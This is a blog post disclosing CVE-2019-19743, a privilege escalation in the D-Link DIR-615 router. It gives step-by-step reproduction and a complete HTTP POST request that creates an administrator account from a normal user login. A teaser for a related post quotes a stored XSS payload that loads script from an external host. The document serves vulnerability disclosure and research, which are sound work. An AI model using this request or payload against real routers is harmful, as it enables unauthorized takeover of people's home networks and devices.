D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

-

######################################################################################
# Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation
# Date: 10.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019–19743
#######################################################################################

Reproduction Steps:
  1. Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
  2. Go to the Maintenance page and click on Admin on the left panel.
  3. There is an option to create a user and by default, it shows only user accounts.
  4. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite.

Privilege Escalation Post Request 


POST /form2userconfig.cgi HTTP/1.1



Host: 192.168.0.1



User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0



Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8



Accept-Language: en-US,en;q=0.5



Accept-Encoding: gzip, deflate



Content-Type: application/x-www-form-urlencoded



Content-Length: 122



Origin: http://192.168.0.1



Connection: close



Referer: http://192.168.0.1/userconfig.htm



Cookie: SessionID=



Upgrade-Insecure-Requests: 1







username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
       5. Now log in with newly created root (ptguy) user. You have all administrator rights.

#####################################################################################

Comments

Post a Comment

Popular posts from this blog

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

-
############################## ############################## ########################## # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting # Date: 13.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage:  http://www.dlink.co. in # Category: Hardware (Wi-fi Router) # Hardware Link:  http://www.dlink.co.in/ products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19742 ############################## ############################## ########################### Reproduction Steps:  — — — — — — — — — — — — — — —  Login to your wi-fi router gateway with admin credentials [i.e:  http://192.168.0.1 ] Go to Maintenance page and click on Admin on the left pannel. Put blind XSS Payload in to the name field — “><script src= https://ptguy.xss.ht ></ script>. This payload saved by the server and its reflected in the user page. Every refresh in the user home pag
Read more

BUG BOUNTY HUNTING (METHODOLOGY ,TOOLKIT ,TIPS & TRICKS, BlOGS)

-
Image
What is Bug Bounty? A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and compensation for reporting bugs , especially those pertaining to exploits and vulnerabilities.   A reward offered to a perform who identifies an error or vulnerability in a computer program or system. ‘The company boosts security by offering a bug bounty’   Bug Bounty - Image Source Google Bug Bounty Programs Bugcrowd https://www.bugcrowd.com/ Hackerone  https://www.hackerone.com/ Synack https://www.synack.com/ Japan Bug bounty Program https://bugbounty.jp/ Cobalt https://cobalt.io/ Zerocopter https://zerocopter.com/ Bug Bounty- Image Source Google Some Books reading about Bug Hunting There are some books for Web application penetration testing methodology and hunting the web. Through this you learn the basics and essentials of penetration testing and bug hunting. Since bug b
Read more